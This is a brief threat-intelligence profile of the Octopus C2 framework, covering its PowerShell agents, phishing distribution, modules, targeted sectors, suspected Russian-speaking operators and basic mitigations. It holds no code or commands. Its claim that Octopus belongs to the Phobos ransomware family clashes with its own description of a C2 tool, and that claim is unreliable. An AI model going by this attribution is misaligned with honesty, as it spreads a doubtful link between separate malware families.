Octopus

Octopus is a Python C2 server to control a PowerShell agent over HTTP/S. It’s part of the Phobos ransomware family which encrypts files and denies access to the user. It has been modified to fit specific targeted campaigns.

Key Insights

Octopus is a C2 server, it’s used to communicate with the attacker and the compromised systems. It uses PowerShell agents to execute commands, exfiltrate data, and deploy additional payloads. It’s modular so the attacker can customize the functionality according to his needs.

Distribution

Attackers distribute Octopus through phishing campaigns, using malicious attachments or links to trick the victim. Once the victim interacts with the malicious content the PowerShell agent will connect to the Octopus C2 server and the attacker will have control over the infected system.

Evolution and Adaptations

Octopus has evolved over time to include various modules for different operations, like credential harvesting, lateral movement and data exfiltration. This makes it a versatile tool for attackers targeting different industries and goals.

Known Variants

Octopus has been modified to fit different targeted campaigns. These variants may include data theft, espionage or ransomware deployment depending on the attacker’s goals.

Mitigation Strategies

Monitor endpoints for PowerShell activity.
Segment networks.
Use MFA.
Train users to recognize phishing.

Targeted Industries or Sectors

Octopus targets telecommunications and government, espionage and data theft. Its modularity allows the attacker to customize the campaign against different sectors according to his needs.

Associated Threat Actors

Octopus is associated with Russian speaking threat groups conducting targeted attacks. These groups use Octopus to breach networks, gather intelligence and exfiltrate sensitive data.